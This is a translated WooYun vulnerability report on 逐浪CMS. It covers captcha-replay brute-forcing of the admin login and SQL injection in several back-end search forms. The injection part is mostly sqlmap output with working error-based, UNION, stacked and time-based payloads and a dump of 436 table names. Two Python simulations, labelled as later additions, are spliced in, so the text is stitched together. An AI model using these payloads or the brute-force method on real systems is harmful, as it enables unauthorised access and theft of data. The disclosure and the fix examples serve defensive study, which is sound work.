逐浪CMS latest version: from brute-force login to widespread back-end SQL injection, a collection (improper captcha design)

admin  2015-05-14 15:03:11
Summary

2014-08-05: Details reported to the vendor, awaiting vendor handling
2014-08-06: Vendor confirmed; details disclosed to the vendor only
2014-08-09: Details opened to third-party security partners (绿盟科技, 唐朝安全巡航, 无声信息)
2014-09-30: Details disclosed to core white hats and relevant domain experts
2014-10-10: Details disclosed to regular white hats
2014-10-20: Details disclosed to intern white hats
2014-11-03: Details disclosed to the public

Vulnerability overview

Defect ID: WooYun-2014-70959

Vulnerability title: 逐浪CMS latest version: from brute-force login to widespread back-end SQL injection, a collection (improper captcha design)

Vendor: 逐浪CMS

Author: 路人甲

Submitted: 2014-08-05 19:13

Published: 2014-11-03 19:14

Vulnerability type: SQL injection

Severity: Medium

Self-assessed Rank: 10

Status: Vendor confirmed

Source: www.wooyun.org; contact us if you have questions or need help

Tags: SQL injection exploitation techniques, .NET + SQL Server injection, back-end authentication bypass


Vulnerability details

Brief description:

See title.

Detailed description:

There are two problems:

1. The captcha is badly designed, so the back-end administrator account password can be brute-forced;

2. Multiple injection points in the back-end (in the search features) give access to all kinds of sensitive information.

Proof of vulnerability:

#1. Improper captcha design

逐浪 back-end address: http://**.**.**.**/Admin/login.aspx

At first there was no captcha, so I started brute-forcing, but then found that the server began replying "captcha error".

After filling in the captcha once and capturing that request, I kept brute-forcing the password field with it, and found the brute-force succeeded.

(screenshot)

Successfully entered the back-end:

(screenshot)
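The behaviour described above, as an added illustration that is not part of the original report or of 逐浪CMS's code: a simulated login handler in Python that checks the captcha against the session value but never discards it, so one captured request can be replayed with every password in a wordlist, placed beside a handler that consumes the captcha on every attempt and counts failures. The account name, password, wordlist and session model are constructed for the example.

```python
import secrets
import string

# Constructed data for the simulation (not from the report).
ADMIN_USER = "admin"
ADMIN_PASSWORD = "zoomla2014"   # assumption: a weak password that the wordlist happens to contain
WORDLIST = ["123456", "password", "admin888", "zoomla2014", "qwerty"]


def issue_captcha(session):
    """Generate a new 4-digit captcha challenge and store the answer in the session."""
    session["captcha"] = "".join(secrets.choice(string.digits) for _ in range(4))
    return session["captcha"]


def login_reusable_captcha(session, username, password, captcha):
    """Vulnerable pattern: the captcha is compared against the session value but
    never cleared, so a single captured request can be replayed indefinitely."""
    if session.get("captcha") is None or captcha != session["captcha"]:
        return "captcha error"
    if username == ADMIN_USER and password == ADMIN_PASSWORD:
        return "ok"
    return "bad credentials"


def login_one_time_captcha(session, username, password, captcha):
    """Hardened pattern: the captcha answer is consumed on every attempt, whether
    or not it matches, so each request needs a freshly solved challenge; failed
    logins are counted so the account locks even if the attacker solves captchas."""
    expected = session.pop("captcha", None)   # consumed regardless of outcome
    if expected is None or not secrets.compare_digest(captcha, expected):
        return "captcha error"
    if session.get("failures", 0) >= 5:
        return "locked"
    if username == ADMIN_USER and password == ADMIN_PASSWORD:
        session["failures"] = 0
        return "ok"
    session["failures"] = session.get("failures", 0) + 1
    return "bad credentials"


def brute_force(login, session):
    """Attacker loop: solve the captcha once, then replay the captured captcha
    value with every candidate password (what an Intruder-style tool does)."""
    captured_captcha = issue_captcha(session)   # the attacker solves it exactly once
    for candidate in WORDLIST:
        if login(session, ADMIN_USER, candidate, captured_captcha) == "ok":
            return candidate
    return None


if __name__ == "__main__":
    print("reusable captcha ->", brute_force(login_reusable_captcha, {}))
    print("one-time captcha ->", brute_force(login_one_time_captcha, {}))
```

Against the reusable handler the loop recovers the password; against the one-time handler every request after the first fails with "captcha error", which is the property the vendor's "captcha after three attempts" mechanism needs in order to mean anything.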

#2. Wide-ranging SQL injection:

a. First, the search in product management

(screenshot)

Code block:
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: (custom) POST
Parameter: #1*
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: __VIEWSTATE=/wEPDwUKMTQ3MDI4OTY1Mw9kFgJmD2QWAgIDD2QWBmYPDxYCHghJbWFnZVVybAUbL2ltYWdlcy91c2VyZmFjZS9ub2ZhY2UuZ2lmZGQCAQ8PFgIeBFRleHQFBndvb3l1bmRkAgIPDxYCHwEFClsg5paw6am0IF1kZGS0q3/kPqTc83++8LszhAJtMNinlFqP1hhSKku0dKva3A==&ctl00$keyText=&ctl00$Content$TxtProjectName=123' AND 3515=CONVERT(INT,(SELECT CHAR(113)+CHAR(115)+CHAR(104)+CHAR(108)+CHAR(113)+(SELECT (CASE WHEN (3515=3515) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(112)+CHAR(98)+CHAR(113))) AND 'Cqgx'='Cqgx&ctl00$Content$BtnCommit=%E6%8F%90%E4%BA%A4

Type: UNION query
Title: Generic UNION query (NULL) - 8 columns
Payload: __VIEWSTATE=/wEPDwUKMTQ3MDI4OTY1Mw9kFgJmD2QWAgIDD2QWBmYPDxYCHghJbWFnZVVybAUbL2ltYWdlcy91c2VyZmFjZS9ub2ZhY2UuZ2lmZGQCAQ8PFgIeBFRleHQFBndvb3l1bmRkAgIPDxYCHwEFClsg5paw6am0IF1kZGS0q3/kPqTc83++8LszhAJtMNinlFqP1hhSKku0dKva3A==&ctl00$keyText=&ctl00$Content$TxtProjectName=123' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(115)+CHAR(104)+CHAR(108)+CHAR(113)+CHAR(120)+CHAR(81)+CHAR(83)+CHAR(66)+CHAR(119)+CHAR(87)+CHAR(74)+CHAR(73)+CHAR(100)+CHAR(89)+CHAR(113)+CHAR(107)+CHAR(112)+CHAR(98)+CHAR(113),NULL-- &ctl00$Content$BtnCommit=%E6%8F%90%E4%BA%A4

Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: __VIEWSTATE=/wEPDwUKMTQ3MDI4OTY1Mw9kFgJmD2QWAgIDD2QWBmYPDxYCHghJbWFnZVVybAUbL2ltYWdlcy91c2VyZmFjZS9ub2ZhY2UuZ2lmZGQCAQ8PFgIeBFRleHQFBndvb3l1bmRkAgIPDxYCHwEFClsg5paw6am0IF1kZGS0q3/kPqTc83++8LszhAJtMNinlFqP1hhSKku0dKva3A==&ctl00$keyText=&ctl00$Content$TxtProjectName=123'; WAITFOR DELAY '0:0:5'--&ctl00$Content$BtnCommit=%E6%8F%90%E4%BA%A4

Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: __VIEWSTATE=/wEPDwUKMTQ3MDI4OTY1Mw9kFgJmD2QWAgIDD2QWBmYPDxYCHghJbWFnZVVybAUbL2ltYWdlcy91c2VyZmFjZS9ub2ZhY2UuZ2lmZGQCAQ8PFgIeBFRleHQFBndvb3l1bmRkAgIPDxYCHwEFClsg5paw6am0IF1kZGS0q3/kPqTc83++8LszhAJtMNinlFqP1hhSKku0dKva3A==&ctl00$keyText=&ctl00$Content$TxtProjectName=123' WAITFOR DELAY '0:0:5'--&ctl00$Content$BtnCommit=%E6%8F%90%E4%BA%A4
---
web server operating system: Windows 8.1 or 2012 R2
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 8.5
back-end DBMS: Microsoft SQL Server 2008
current database: 'demozoomla'

436 tables:

Code block:
Database: demozoomla
[436 tables]
+-----------------------------------+
| ZL_3DMusic |
| ZL_3DPanoramic |
| ZL_3DShop |
| ZL_Accountinfo |
| ZL_AdZone |
| ZL_Adbuy |
| ZL_AddRessList |
| ZL_Advertisement |
| ZL_Agent |
| ZL_Allianceinfo |
| ZL_Answer |
| ZL_Answer_Recode |
| ZL_App |
| ZL_Arrive |
| ZL_ArticleOrders |
| ZL_ArticlePromotion |
| ZL_Ask |
| ZL_AskCommon |
| ZL_Auction |
| ZL_AuditingState |
| ZL_Author |
| ZL_Baike |
| ZL_BaikeEdit |
| ZL_Bbscate |
| ZL_Bbstips |
| ZL_BiaoQian |
| ZL_Bid |
| ZL_Bider |
| ZL_BigLog |
| ZL_BindFlolar |
| ZL_BindPro |
| ZL_BlogAnswer |
| ZL_BlogAsk |
| ZL_BlogContent |
| ZL_BlogLiving |
| ZL_BookRead |
| ZL_BossInfo |
| ZL_C_Announce |
| ZL_C_Article |
| ZL_C_Factory |
| ZL_C_FriendSite |
| ZL_C_Info |
| ZL_C_Photo |
| ZL_C_Plugins |
| ZL_C_RedirectLink |
| ZL_C_soft |
| ZL_C_video |
| ZL_CallNode |
| ZL_CallNote |
| ZL_Card |
| ZL_CardType |
| ZL_Cart |
| ZL_CartPro |
| ZL_Cash |
| ZL_ChangeProduct |
| ZL_ChangeTalk |
| ZL_Chart |
| ZL_Chat |
| ZL_Class |
| ZL_ClassRoom |
| ZL_ClientRequire |
| ZL_Client_Additional |
| ZL_Client_Basic |
| ZL_Client_Enterprise |
| ZL_Client_Penson |
| ZL_CollectionInfo |
| ZL_CollectionItem |
| ZL_Comment |
| ZL_Commodities |
| ZL_CommonModel |
| ZL_CompSecretary |
| ZL_Compete |
| ZL_CompleteHistory |
| ZL_ComponentClass |
| ZL_ComponentPlatform |
| ZL_Content_ScheTask |
| ZL_Correct |
| ZL_Count_Browser |
| ZL_Count_Iplocal |
| ZL_Count_Local |
| ZL_Count_Month |
| ZL_Count_Os |
| ZL_Count_Site |
| ZL_Count_Visitor |
| ZL_Count_Year |
| ZL_Count_dtproperties |
| ZL_Course |
| ZL_Courseware |
| ZL_CpsClick |
| ZL_CreateJS |
| ZL_CrmAuthList |
| ZL_CustomerService |
| ZL_DataList |
| ZL_DataSource |
| ZL_Datadic |
| ZL_Datadiccategory |
| ZL_Defray |
| ZL_Delivier |
| ZL_DocList |
| ZL_DocModel |
| ZL_DocPermission |
| ZL_DownServer |
| ZL_EditWord |
| ZL_EnrollList |
| ZL_ExAnswer |
| ZL_ExAttendance |
| ZL_ExChange |
| ZL_ExClassgroup |
| ZL_ExLecturer |
| ZL_ExStudent |
| ZL_ExStudytime |
| ZL_ExTeacher |
| ZL_ExamPoint |
| ZL_Exam_Class |
| ZL_Exam_Sys_Papers |
| ZL_Exam_Sys_Questions |
| ZL_Exam_Type |
| ZL_Examination |
| ZL_Examinee |
| ZL_Exroom |
| ZL_FTPConfig |
| ZL_Favorite |
| ZL_File |
| ZL_Flow |
| ZL_Frient |
| ZL_GiftCard_User |
| ZL_GiftCard_shop |
| ZL_Grade |
| ZL_GradeCate |
| ZL_Group |
| ZL_GroupBuy |
| ZL_GroupBuyList |
| ZL_GroupFieldPermissions |
| ZL_GroupModel |
| ZL_GuestAnswer |
| ZL_Guestbook |
| ZL_Guestcate |
| ZL_HidTopic |
| ZL_Hits |
| ZL_Honor |
| ZL_IDC_DBList |
| ZL_IDC_DNSSubDom |
| ZL_IDC_DNSTable |
| ZL_IDC_DomainList |
| ZL_IDC_DomainLog |
| ZL_IDC_DomainPrice |
| ZL_IDC_DomainTemp |
| ZL_IDC_Log |
| ZL_IDC_Server |
| ZL_IDC_SiteList |
| ZL_IPUrl |
| ZL_IPclass |
| ZL_IPpara |
| ZL_IServer |
| ZL_IServerReply |
| ZL_Interlocution |
| ZL_InviteRecord |
| ZL_InvtoType |
| ZL_Keyword |
| ZL_Keywords |
| ZL_LinkName |
| ZL_Log |
| ZL_MTit |
| ZL_Magazine |
| ZL_MailIdiograph |
| ZL_MailInfo |
| ZL_MailManage |
| ZL_MailReceive |
| ZL_MailSet |
| ZL_MailTemp |
| ZL_MailType |
| ZL_Manager |
| ZL_Manufacturers |
| ZL_Map |
| ZL_MbClass |
| ZL_MbComment |
| ZL_MbTheme |
| ZL_Mbtopic |
| ZL_Message |
| ZL_MiUserInfo |
| ZL_Microb |
| ZL_Mis |
| ZL_MisApproval |
| ZL_MisAttendance |
| ZL_MisInfo |
| ZL_MisPlan |
| ZL_MisProLevel |
| ZL_MisProcedure |
| ZL_MisSign |
| ZL_MisType |
| ZL_Mis_AppProg |
| ZL_Mis_Model |
| ZL_Model |
| ZL_ModelField |
| ZL_MoneyManage |
| ZL_MuClass |
| ZL_MuPage |
| ZL_MuPic |
| ZL_MuProduct |
| ZL_MuTemp |
| ZL_MultiNode |
| ZL_MySubscription |
| ZL_Node |
| ZL_NodeBindDroit |
| ZL_NodeRole |
| ZL_Node_ModelTemplate |
| ZL_OAC_111 |
| ZL_OA_BC |
| ZL_OA_Document |
| ZL_OA_FreePro |
| ZL_OA_PBTable |
| ZL_OA_Sign |
| ZL_OA_UserConfig |
| ZL_Online |
| ZL_OnlineCusServ |
| ZL_OnlineUsers |
| ZL_OrderBaseField |
| ZL_OrderDelivery |
| ZL_OrderSql |
| ZL_Order_LuckCode |
| ZL_Order_PayLog |
| ZL_Orderinfo |
| ZL_P_Shop |
| ZL_Package |
| ZL_Page |
| ZL_PageReg |
| ZL_PageStyle |
| ZL_PageTemplate |
| ZL_Page_Content |
| ZL_Page_fwefw |
| ZL_Paper_Questions |
| ZL_Papers_System |
| ZL_Papers_User |
| ZL_Passenger |
| ZL_PayPlat |
| ZL_Payment |
| ZL_Permission |
| ZL_Plan |
| ZL_PlanSql |
| ZL_PointGrounp |
| ZL_PointRecord |
| ZL_PointTrans |
| ZL_Present |
| ZL_Print |
| ZL_PrintMode |
| ZL_PrintPic |
| ZL_PrintType |
| ZL_Process |
| ZL_Processes |
| ZL_Project |
| ZL_ProjectAffairs |
| ZL_ProjectBaseField |
| ZL_ProjectCategory |
| ZL_ProjectDiscuss |
| ZL_ProjectField |
| ZL_ProjectType |
| ZL_ProjectWork |
| ZL_Projects |
| ZL_ProjectsBase |
| ZL_ProjectsComments |
| ZL_PromoCount |
| ZL_Promotion |
| ZL_Promotions |
| ZL_Pub |
| ZL_Pub_TW |
| ZL_Pub_WTHD |
| ZL_Pub_WZTP |
| ZL_Pub_ZJDA |
| ZL_Pub_ZXDC |
| ZL_Pub_huodong |
| ZL_QrCode |
| ZL_Question |
| ZL_Questions |
| ZL_Questions_Class |
| ZL_Questions_Knowledge |
| ZL_Questions_Type |
| ZL_Questions_User |
| ZL_RebateOrder |
| ZL_Rebates |
| ZL_Recruitment |
| ZL_RedEnvelope |
| ZL_Redindulgence |
| ZL_Reg_Page |
| ZL_Regsterapi |
| ZL_Result |
| ZL_Role |
| ZL_RolePermissions |
| ZL_RoomActive |
| ZL_RoomActiveJoin |
| ZL_RoomCall |
| ZL_RoomInfo |
| ZL_RoomMessage |
| ZL_RoomNotify |
| ZL_RoomUpFile |
| ZL_RoomUser |
| ZL_SQL |
| ZL_S_FloGoods |
| ZL_S_FloPack |
| ZL_S_shop |
| ZL_Scheme |
| ZL_SchemeInfo |
| ZL_School |
| ZL_ScoreStatics |
| ZL_Search |
| ZL_Sensitivity |
| ZL_ServiceSeat |
| ZL_SettlementInfoList |
| ZL_ShopCommentary |
| ZL_ShopCompete |
| ZL_ShopGrade |
| ZL_ShopLable |
| ZL_ShopNodeinfo |
| ZL_Shopconfig |
| ZL_Shopsearch |
| ZL_Shopsite |
| ZL_ShopsiteClass |
| ZL_SitePas |
| ZL_SitePicAdv |
| ZL_SiteTextAdv |
| ZL_Sns_Active |
| ZL_Sns_ActiveJoin |
| ZL_Sns_ActivePic |
| ZL_Sns_ActiveType |
| ZL_Sns_BlogStyleTable |
| ZL_Sns_BookTable |
| ZL_Sns_CarConfig |
| ZL_Sns_CarLog |
| ZL_Sns_Carlist |
| ZL_Sns_ChatLog |
| ZL_Sns_CollectTable |
| ZL_Sns_CommendCommentOn |
| ZL_Sns_CommentAll |
| ZL_Sns_FileShare |
| ZL_Sns_GSHuatee |
| ZL_Sns_GSReverCricicism |
| ZL_Sns_GSRoom |
| ZL_Sns_GSType |
| ZL_Sns_GatherStrain |
| ZL_Sns_GroupPicCateg |
| ZL_Sns_HomeCollocate |
| ZL_Sns_HomeHeadCollocate |
| ZL_Sns_Kiss |
| ZL_Sns_Log |
| ZL_Sns_LogCriticism |
| ZL_Sns_LookLog |
| ZL_Sns_LotMessage |
| ZL_Sns_LotNote |
| ZL_Sns_Memo |
| ZL_Sns_Messageboard |
| ZL_Sns_MyCar |
| ZL_Sns_MyPose |
| ZL_Sns_PicCateg |
| ZL_Sns_PicCritique |
| ZL_Sns_PicTure |
| ZL_Sns_ProductTable |
| ZL_Sns_ProductTypetable |
| ZL_Sns_ReplayLog |
| ZL_Sns_Report |
| ZL_Sns_SystemBannerTable |
| ZL_Sns_SystemLog |
| ZL_Sns_UserLog |
| ZL_Sns_UserLogType |
| ZL_Sns_UserMoreinfo |
| ZL_Sns_UserShopProduct |
| ZL_Sns_User_R_GS |
| ZL_Sns_User_R_Module |
| ZL_Sns_blogTable |
| ZL_Source |
| ZL_SpecCate |
| ZL_SpecInfo |
| ZL_Special |
| ZL_Stock |
| ZL_StoreStyleTable |
| ZL_Store_reg |
| ZL_Structure |
| ZL_Student |
| ZL_SubscriptionCount |
| ZL_Survey |
| ZL_Trademark |
| ZL_UAgent |
| ZL_U_comp |
| ZL_U_jl |
| ZL_U_zp |
| ZL_Ucenter |
| ZL_UnionInfo |
| ZL_User |
| ZL_UserApp |
| ZL_UserBase |
| ZL_UserBaseField |
| ZL_UserCaritHis |
| ZL_UserCart |
| ZL_UserCartPro |
| ZL_UserClass |
| ZL_UserCoinHis |
| ZL_UserCourse |
| ZL_UserDay |
| ZL_UserExpDomP |
| ZL_UserExpHis |
| ZL_UserFave |
| ZL_UserFriendGroup |
| ZL_UserFriendTable |
| ZL_UserGrade |
| ZL_UserGroup |
| ZL_UserOrderinfo |
| ZL_UserPromotions |
| ZL_UserPurview |
| ZL_UserRecei |
| ZL_UserRegisterIP |
| ZL_UserRoom |
| ZL_UserShop |
| ZL_UserStock |
| ZL_UserStoreTable |
| ZL_UserStoreTypeTable |
| ZL_VJobInfo |
| ZL_VResume |
| ZL_VRoom |
| ZL_VideoHall |
| ZL_VideoHouse |
| ZL_VideoHouseApply |
| ZL_VideoInfo |
| ZL_VideoMessage |
| ZL_VideoRoom |
| ZL_VideoUser |
| ZL_VideoUserFriend |
| ZL_VideoUserGroup |
| ZL_View |
| ZL_ViewHistory |
| ZL_WapArticle |
| ZL_WorkRole |
| ZL_Zone_Advertisement |
| ZL_Zone_Node |
| ZL_Zone_Site |
| ZL_Zone_question |
| ZL_page_app |
| ZL_wxMsg |
| demozoomla_f.ZL_Content_WordChain |
+-----------------------------------+

b. The search in the visit-review (访问评价) area:

(screenshot)

Code block:
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: (custom) POST
Parameter: #1*
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: ------WebKitFormBoundary5n6dB9dFzpkAYygr
Content-Disposition: form-data; name="__EVENTTARGET"


------WebKitFormBoundary5n6dB9dFzpkAYygr
Content-Disposition: form-data; name="__EVENTARGUMENT"


------WebKitFormBoundary5n6dB9dFzpkAYygr
Content-Disposition: form-data; name="__LASTFOCUS"


------WebKitFormBoundary5n6dB9dFzpkAYygr
Content-Disposition: form-data; name="__VIEWSTATE"

(__VIEWSTATE value omitted)
------WebKitFormBoundary5n6dB9dFzpkAYygr
Content-Disposition: form-data; name="ctl00$Content$txtTitle"

123456%' AND 2825=CONVERT(INT,(SELECT CHAR(113)+CHAR(114)+CHAR(121)+CHAR(105)+CHAR(113)+(SELECT (CASE WHEN (2825=2825) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(117)+CHAR(121)+CHAR(105)+CHAR(113))) AND '%'='
------WebKitFormBoundary5n6dB9dFzpkAYygr
Content-Disposition: form-data; name="ctl00$Content$txtTime"

2014-08
------WebKitFormBoundary5n6dB9dFzpkAYygr
Content-Disposition: form-data; name="ctl00$Content$btnSeach"

(mis-encoded button label)
------WebKitFormBoundary5n6dB9dFzpkAYygr
Content-Disposition: form-data; name="ctl00$Content$Egv$ctl13$ctl06"

10
------WebKitFormBoundary5n6dB9dFzpkAYygr
Content-Disposition: form-data; name="ctl00$Content$Egv$ctl13$ctl07"

1
------WebKitFormBoundary5n6dB9dFzpkAYygr--

Type: UNION query
Title: Generic UNION query (NULL) - 9 columns
Payload: ------WebKitFormBoundary5n6dB9dFzpkAYygr
Content-Disposition: form-data; name="__EVENTTARGET"


------WebKitFormBoundary5n6dB9dFzpkAYygr
Content-Disposition: form-data; name="__EVENTARGUMENT"


------WebKitFormBoundary5n6dB9dFzpkAYygr
Content-Disposition: form-data; name="__LASTFOCUS"


------WebKitFormBoundary5n6dB9dFzpkAYygr
Content-Disposition: form-data; name="__VIEWSTATE"

(__VIEWSTATE value omitted)
------WebKitFormBoundary5n6dB9dFzpkAYygr
Content-Disposition: form-data; name="ctl00$Content$txtTitle"

123456%' UNION ALL SELECT CHAR(113)+CHAR(114)+CHAR(121)+CHAR(105)+CHAR(113)+CHAR(100)+CHAR(87)+CHAR(122)+CHAR(70)+CHAR(88)+CHAR(112)+CHAR(69)+CHAR(101)+CHAR(77)+CHAR(72)+CHAR(113)+CHAR(117)+CHAR(121)+CHAR(105)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
------WebKitFormBoundary5n6dB9dFzpkAYygr
Content-Disposition: form-data; name="ctl00$Content$txtTime"

2014-08
------WebKitFormBoundary5n6dB9dFzpkAYygr
Content-Disposition: form-data; name="ctl00$Content$btnSeach"

(mis-encoded button label)
------WebKitFormBoundary5n6dB9dFzpkAYygr
Content-Disposition: form-data; name="ctl00$Content$Egv$ctl13$ctl06"

10
------WebKitFormBoundary5n6dB9dFzpkAYygr
Content-Disposition: form-data; name="ctl00$Content$Egv$ctl13$ctl07"

1
------WebKitFormBoundary5n6dB9dFzpkAYygr--

Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: ------WebKitFormBoundary5n6dB9dFzpkAYygr
Content-Disposition: form-data; name="__EVENTTARGET"


------WebKitFormBoundary5n6dB9dFzpkAYygr
Content-Disposition: form-data; name="__EVENTARGUMENT"


------WebKitFormBoundary5n6dB9dFzpkAYygr
Content-Disposition: form-data; name="__LASTFOCUS"


------WebKitFormBoundary5n6dB9dFzpkAYygr
Content-Disposition: form-data; name="__VIEWSTATE"

(__VIEWSTATE value omitted)
------WebKitFormBoundary5n6dB9dFzpkAYygr
Content-Disposition: form-data; name="ctl00$Content$txtTitle"

123456%'; WAITFOR DELAY '0:0:5'--
------WebKitFormBoundary5n6dB9dFzpkAYygr
Content-Disposition: form-data; name="ctl00$Content$txtTime"

2014-08
------WebKitFormBoundary5n6dB9dFzpkAYygr
Content-Disposition: form-data; name="ctl00$Content$btnSeach"

(mis-encoded button label)
------WebKitFormBoundary5n6dB9dFzpkAYygr
Content-Disposition: form-data; name="ctl00$Content$Egv$ctl13$ctl06"

10
------WebKitFormBoundary5n6dB9dFzpkAYygr
Content-Disposition: form-data; name="ctl00$Content$Egv$ctl13$ctl07"

1
------WebKitFormBoundary5n6dB9dFzpkAYygr--

Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: ------WebKitFormBoundary5n6dB9dFzpkAYygr
Content-Disposition: form-data; name="__EVENTTARGET"


------WebKitFormBoundary5n6dB9dFzpkAYygr
Content-Disposition: form-data; name="__EVENTARGUMENT"


------WebKitFormBoundary5n6dB9dFzpkAYygr
Content-Disposition: form-data; name="__LASTFOCUS"


------WebKitFormBoundary5n6dB9dFzpkAYygr
Content-Disposition: form-data; name="__VIEWSTATE"

(__VIEWSTATE value omitted)
------WebKitFormBoundary5n6dB9dFzpkAYygr
Content-Disposition: form-data; name="ctl00$Content$txtTitle"

123456%' WAITFOR DELAY '0:0:5'--
------WebKitFormBoundary5n6dB9dFzpkAYygr
Content-Disposition: form-data; name="ctl00$Content$txtTime"

2014-08
------WebKitFormBoundary5n6dB9dFzpkAYygr
Content-Disposition: form-data; name="ctl00$Content$btnSeach"

(mis-encoded button label)
------WebKitFormBoundary5n6dB9dFzpkAYygr
Content-Disposition: form-data; name="ctl00$Content$Egv$ctl13$ctl06"

10
------WebKitFormBoundary5n6dB9dFzpkAYygr
Content-Disposition: form-data; name="ctl00$Content$Egv$ctl13$ctl07"

1
------WebKitFormBoundary5n6dB9dFzpkAYygr--
---
web server operating system: Windows 8.1 or 2012 R2
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 8.5
back-end DBMS: Microsoft SQL Server 2008
current user: 'demozoomla_f'

c. The detail records in shop management:

(screenshot)

(screenshot)

d. The search in yellow-page content management under the enterprise yellow pages

(screenshot)

e. The search in yellow-page tag management under the enterprise yellow pages

(screenshot)
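The search injection pattern behind points a to e, as an added example rather than code from the report or from 逐浪CMS: an assumed search handler that pastes the keyword into a '%...%' LIKE literal (which is why the report's payloads open with 123456%'), a UNION payload and a boolean payload in the same shape run against it, the parameterised replacement, and a decoder for the CHAR(113)+... marker chains that sqlmap uses in the error-based and UNION payloads above. The database is an in-memory SQLite stand-in with made-up rows; the table names come from the report's list, and the SQL Server-specific CONVERT(INT, ...) and WAITFOR DELAY techniques are not reproduced.

```python
import re
import sqlite3


def build_db():
    """Constructed in-memory stand-in for the CMS database.  Table names are taken
    from the report's table list; the columns and rows are made up.  SQLite is used
    so the example runs anywhere (the real target is SQL Server)."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE ZL_Commodities (ID INTEGER, Name TEXT, Price REAL);
        CREATE TABLE ZL_Manager (ID INTEGER, AdminName TEXT, AdminPassword TEXT);
        INSERT INTO ZL_Commodities VALUES (1, 'Keyboard', 99.0), (2, 'Mouse', 49.0);
        INSERT INTO ZL_Manager VALUES (1, 'admin', 'e10adc3949ba59abbe56e057f20f883e');
    """)
    return db


def search_vulnerable(db, keyword):
    """Assumed shape of the CMS search handler: the keyword is concatenated into a
    '%...%' LIKE literal, so a keyword starting with %' closes the literal."""
    sql = "SELECT ID, Name, Price FROM ZL_Commodities WHERE Name LIKE '%" + keyword + "%'"
    return db.execute(sql).fetchall()


def search_fixed(db, keyword):
    """Hardened version: bind the keyword as a parameter and escape LIKE wildcards,
    so the input can neither change the query structure nor dump the whole table."""
    escaped = keyword.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")
    sql = "SELECT ID, Name, Price FROM ZL_Commodities WHERE Name LIKE ? ESCAPE '\\'"
    return db.execute(sql, ("%" + escaped + "%",)).fetchall()


def decode_char_chain(expr):
    """Turn a CHAR(113)+CHAR(115)+... chain from a sqlmap payload back into text.
    sqlmap brackets the value it wants to read with such marker strings so it can
    locate it inside an error message or a UNION row."""
    return "".join(chr(int(code)) for code in re.findall(r"CHAR\((\d+)\)", expr))


# Payloads in the same shape as the report's, adapted to a 3-column result set
# (sqlmap found 8 and 9 columns on the real pages).
UNION_PAYLOAD = "123456%' UNION ALL SELECT ID, AdminName, AdminPassword FROM ZL_Manager--"
TRUE_PAYLOAD = "%' AND 1=1 AND '%'='"    # boolean shape: closes the LIKE literal cleanly
FALSE_PAYLOAD = "%' AND 1=2 AND '%'='"


def demo():
    """Run both handlers against the payloads and a normal keyword."""
    db = build_db()
    return {
        "union_dump": search_vulnerable(db, UNION_PAYLOAD),
        "boolean_true": len(search_vulnerable(db, TRUE_PAYLOAD)),
        "boolean_false": len(search_vulnerable(db, FALSE_PAYLOAD)),
        "fixed_union": search_fixed(db, UNION_PAYLOAD),
        "fixed_wildcard": search_fixed(db, "%"),
        "fixed_normal": search_fixed(db, "key"),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(name, "->", value)
    print(decode_char_chain("CHAR(113)+CHAR(115)+CHAR(104)+CHAR(108)+CHAR(113)"))
```

Run it directly to print the six results: the UNION row is the constructed ZL_Manager record, the two boolean payloads return 2 and 0 rows (the difference a blind injection is built on), and the fixed handler returns nothing for either payload or for a bare % while still matching "key". The decoder shows the error-based payload's CHAR chain is just the marker qshlq, which sqlmap looks for in the CONVERT(INT, ...) error text.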

Remediation:

Fix the captcha design

Fix the search-type injection points

Copyright notice: when reposting, credit the source: 路人甲@乌云


Vulnerability response

Vendor response:

Severity: Low

Vulnerability Rank: 5

Confirmed: 2014-08-06 13:19

Vendor reply:

Our back-end security is guaranteed by the following mechanisms:
1. A captcha appears after three login attempts, which is the issue your report describes.
2. A security code, disabled by default, which can be enabled to strengthen security; it is a preset security code.
3. A changeable back-end path; for the demo we leave the back-end path open, but in practice the back-end path is a changed value.

Thank you for the security issues reported in your article; we will strengthen and improve as soon as possible.

Latest status:

None yet




Comments

  1. 2014-08-05 21:11 | loli ( regular white hat | Rank:649 vulnerabilities:59 | Every man has a masseuse No. 88 named Xiaohong living in his heart. )

    0

    Let it go.

  2. 2014-08-07 06:38 | HackBraid ( core white hat | Rank:1914 vulnerabilities:304 | Someone has recently been impersonating this account to scam people; anyone claiming to be HackBrai... )

    0

    @逐浪CMS Maybe you didn't understand: my brute-force attempts carried the captcha. In other words, it makes no difference whether there is a captcha or not.

  3. 2014-08-26 16:38 | wefgod ( core white hat | Rank:1829 vulnerabilities:183 | more than I can handle )

    1

    There are way more of these in the back-end.
